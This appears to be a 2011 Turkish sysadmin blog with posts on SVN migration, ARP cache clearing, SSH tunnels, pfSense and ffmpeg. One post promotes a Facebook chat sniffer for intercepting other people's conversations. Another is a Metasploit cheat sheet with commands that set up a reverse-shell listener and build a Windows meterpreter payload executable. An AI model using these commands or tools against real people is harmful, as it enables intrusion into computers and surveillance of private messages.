23 Eylül 2011 Cuma

SVN Deposu Nasıl Taşınır

Olurda bir gün kullanmakta olduğunuz svn deposunu başka bir sunucuya vs taşımanız gerekirse bu iş için svnadmin komutunun dump parametresini kullanabilirsiniz...

Önce var olan deponusu svnadmin dump ile tek dosya halinde kayıt edin.

svnadmin dump /var/svn-repos/seker > ./seker.svndump

Yukarıdaki komut svn sunucudaki seker isimli depoyu seker.svndump adında bir dosya olarak saklayacaktır. Bu dosyayı hedef svn sunucuna taşıdıktan sonra yeni sunucumuzdaki yeni depomuzu oluşturalım.

svnadmin create --fs-type fsfs /var/svn-repos/seker


Yeni depo oluşturulduğuna göre dump dosyasındaki verilerimizi yeni depomuza aktarabiliriz.

svnadmin load /var/svn-repos/seker < ./seker.svndump

Yukarıdaki komut işini bitirdiğinde yeni svn sunucunuza taşınmış olacaksınız...



21 Eylül 2011 Çarşamba

ARP Cache Clear

Network ile uğraşırken zaman zaman ARP Cache belleğini temizlemek gerekiyor. Zira ağda bir şeyler değiştiğinde bilgisayarınızın ARP Cache'inde tutulan IP-MAC eşleşmeleri değişmiş olabiliyor. Bir süre sonra bilgisayarınız yeni IP-MAC eşleşmesini keşfediyor olsada bunun için beklemek istemiyorsanız ARP Cache belleğini temizlemek için aşağıdaki gibi bir komut kullanılabilir.

for i in `awk -F ' ' '{ if ( $1 ~ /[0-9{1,3}].[0-9{1,3}].[0-9{1,3}].[0-9{1,3}]/ ) print $1 }' /proc/net/arp` ; do arp -d $i ; done

15 Eylül 2011 Perşembe

Facebook Chat Sniffer

Bu belgede anlatılanlar 2011 yılında yazılmış olup güncelliğini kaybetmiştir ve artık çalışmamaktadır!

Önemli Not:  Yaklaşık 9 ay önce yazılmış olan bu yazı ile ilgili olarak "maksadını aşan","edepsiz" ve "lüzumsuz" yorumlar almaktan sıkıldığımdan bu konu ve yorumları kapatılmıştır... Yorumlara ve sorulara cevap verilmeyecektir...

Eski insanlar doğru söylemiş...  "Kötüye İyilik Yapan Evine Sağ Dönemezmiş"
EOF

Pek çoğumuz sosyal ağlara üyeyiz ve PC başında geçen zamanımızın önemli bir kısmını başta facebook olmak üzere sosyal ayğalarda geçiyor. Üstelik pek çok insan facebook chat özelliğini kişisel iletişim için kullanmaya başlamış durumda. Hatta pek çok anlık mesajlaşma yazılımı facebook chat protokolü üzerinden görüşme yapılmasına izin verir hale geldi...

İşte bu noktada "Olur da günün birinde facebook sohbet kayıtlarını tutmanız gerekirse ne yaparsınız?" sorusu akla geliyor...

Böyle bir ihtiyacınız olduğunda açık kaynak kodlu özgür yazılımların sunduğu nimetleri kullanarak kendi facebook sniffer yazılımınızı kendiniz geliştirirsiniz...

Böyle bir ihtiyaç söz konusu olduğunda ekip olarak küçük bir arge çalışması yaparsınız. Sonra Necmettin Begiter abimiz oturup bu arge sonucunu koda döker ve Facebook Sniffer yazılımı FaboS ortaya çıkar...

FaboS Facebook Chat Sniffer on pfSense RC3
Facebook Sniffer (FaboS) üzerinden geçen trafiği veya yönetilebilir switchlerde bulunan mirror port özelliği sayesinde kendisine iletilen trafiğ izleyerek facebook sohbet kayıtlarını tutabilir...

FaboS Facebook Sniffer, sistemdeki herhangi bir ağ arayüzünü gerçek zamanlı dinleyerek veya wireshark, tcpdump gibi snifferlar ile yakalanmış pcap dosyalarını okuyarak facebook sohbet kayıtlarını ayrıtşırabilir...

Sohbet kayıtlarını doğrudan ektrana basabileceği gibi düz metin (TXT) dosyası olarak saklayabilir, CSV formatında kayıt edebilir veya bir MySQL sunucuna bağlanarak veritabanına kayıt edebilir. MySQL veritabanına yazılan kayıtlar aşağıdaki gibi bir web arayüzü sayesinde izlenebilir ve raporlanabilir...

Fabos Facebook Chat Sniffer Web Gui

FaboS Facebook Sniffer pfSense üzerinde çalışmakta olup, açık kaynak kodlu özgür güvenlik duvarlarında, GNU/Linux, BSD veya Windows işletim sistemi üzerinde çalışabilir durumdadır...

Önemli Not:  Gerekli yasal prosedürler sağlanmaksızın kişiler arasındaki iletişim izlenmesi ve/veya kayıt altına alınması yasadışı olup bu fiilin işlenmesi suç teşkil etmektedir. 

Kullanicilar, bu aracin yasal ve yasadisi kullanimindan dogabilecek yasal yukumlulukleri, maddi, manavi ve olasi her turlu zarari pesinen kabul etmis sayilirlar ve hic bir sekilde gelistiriciler sorumlu tutulamaz.

Bu kodun kullanimindan dogabilecek her turlu zarar ve yukumluluk kullanicilara aittir.


Yasal uyarıyı okuduğunuza göre FaboS Facebook Sniffer aracına buradan ulaşabilirsiniz...

14 Eylül 2011 Çarşamba

Çok Sık Unuttuğum Metasploit Komutları

Sanıırm artık hafızam eskisi kadar kuvvetli değil. Bu nedenle pek çok şeyi hatırlamakta zorlanıyorum. Lazım olduğunda hatırlayamadığım bu nasıl kullanılıyordu diye cebelleşmek zorunda kaldığım bir kaç metasploit komutunu buraya not alayım diye düşündüm...

Dinleme Moduna Geçmek
Aşağıdaki komutla metasploit dinleme moduna geçerek gelecek bağlantıları beklemeye başlayacaktır. Çalışan payload işlevini yakalayıp kullanabilmek için gereklidir...

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.2.124 LPORT=9999 E
 
Payload için EXE oluşturma

Payload kodu ikilik hale getirilip Windows sistemlerde çalıbilecek exe dosyasına dönüştürülür. Bir şekilde bu bu exe dosyası çalıştırıldığında Payload işlevi yürütülecektir...

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.124 LPORT=8888 X > /root/test.exe

Uzun süre önce bu yöntemi, bilgisayarıyla arası iyi olmayan romanyadaki bir müşterimizin teamvewer gibi bir aracı çalıştıramıyor olması nedeniyle kullanmış ve Reverse VNC ile bilgisayarına bağlanarak kullandığı yazılım ile ilgi destek vermiştim. Olur ya teamviewer gibi araçları kurup çalıştıramayan birileri olursa, reverse_vnc payloadu için bir exe dosyası oluşturun ve bu exe dosyasını gönderip çalıştırmalarını isteyin...

13 Eylül 2011 Salı

pfSense 2.0 Kararlı Sürüm Çıktı

pfSense 2.0 nihayet kararlı sürüme ulaştı. pfSense geliştiricilerinden Chris Buechler bu girdisinde "pfSense 2.0 release is building right now." diyor ve pfSense git deposunundan şu linki veriyor...

pfSense 2.0 kararlı sürüm için bu girdinin yazıldığı saatlerde iso imajı bulunmuyor ancak build süreci devam ediyordu...

pfSense 2.0 sürümüne kavuşmak için sabırsızlanıyorsanız https://github.com/bsdperimeter/pfsense bağlantısından pfSense 2.0 Release sürümüne ait dosyalara ulaşabilir, hatta https://github.com/bsdperimeter/pfsense-tools bağlantıdaki araçları kullanarak kendi pfSense dağıtımınızı oluşturabilirsiniz.

Ancak derleme işleminin uzun ve sancılı olacağı gerçeğini göz önüne alırsanız şu andan sonra iso imajının http://snapshots.pfsense.org/ adresine düşmesini beklemek daha cazip olacaktır gibime geliyor...

NOT: Artık http://pfsense.phoenixkv.net/downloads/ adresinden pfSense 2.0 Release indirilebilir durumdadır...

8 Eylül 2011 Perşembe

SSH Tunel

SSH protokolünün en güzel özelliklerinden birisi de tünel kazılabilmesine imkan vermesidir. Aşağıdaki gibi bir ağ şeması üzerinde bir kaç örnek ile neler yapabileceğimizi yazalım...


SSH Server ve Proxy Server isimli sunucular firewall ardında yer almakta olup, SSH Server Internet üzeründen port yönlendirmeyle erişilebilir durumdadır. Gondor isimli bilgisayar internet üzerinden SSH server isimli sunucuya SSH ile erişebiliyor. Ancak Proxy Server sunucusuna erişim firewall tarafından engellenmiş durumdadır.

Dinamik SSH Tüneli Oluşturmak
Bu senaryomuzda dinamik ssh tüneli oluşturalım ve gondor bilgisayarı ssh ile bağlandığı SSH Server bilgisayarı üzerinden web sayfalarına ulaşsın. Bunun için gondor bilgisayarı aşağıdaki gibi bir komut verebilir.

ssh -D 8888 root@11.22.33.44


6 Eylül 2011 Salı

FFMpeg FLV - MP3 Converter

Zaman zaman video ve ses dosyalarını dönüştürmem gerekiyor. Bunun için ffmpeg kullanıyor olsam da çok sık kullanmadığım için hangi parametre ne yapıyordu hatırlamıyorum. Bu yüzden de ihtiyaç duydukca Google amcaya danışıp işleri halletmeye çalışıyorum. Tabii ki bu oldukça sancılı bir süreç haline geliyor...

Bu kez de flv dosyasından mp3 oluşturmak istedim. Yine google amcaya danıştım ancak bu kez aşağıdaki komutla dönüştürme işlemi yapmak istediğimde aşağıdaki hata mesajını almaya başladım...

ffmpeg -i ornek.flv -acodec libmp3lame -ab 128k ornek.mp3
...
Unknown encoder 'libmp3lame'

ffmpeg  "Unknown encoder 'libmp3lame'" diyerek dönüştürme işlemini yapmıyordu. Çözüm olarak aşağıdaki komutla libavcodec-extra-52 paketini kurmak gerekiyor.

sudo apt-get install libavcodec-extra-52

Daha sonra ise aşağıdaki komutu vererek mutlu sona erişebiliyoruz...

ffmpeg -i ornek.flv -acodec libmp3lame -ab 128k ornek.mp3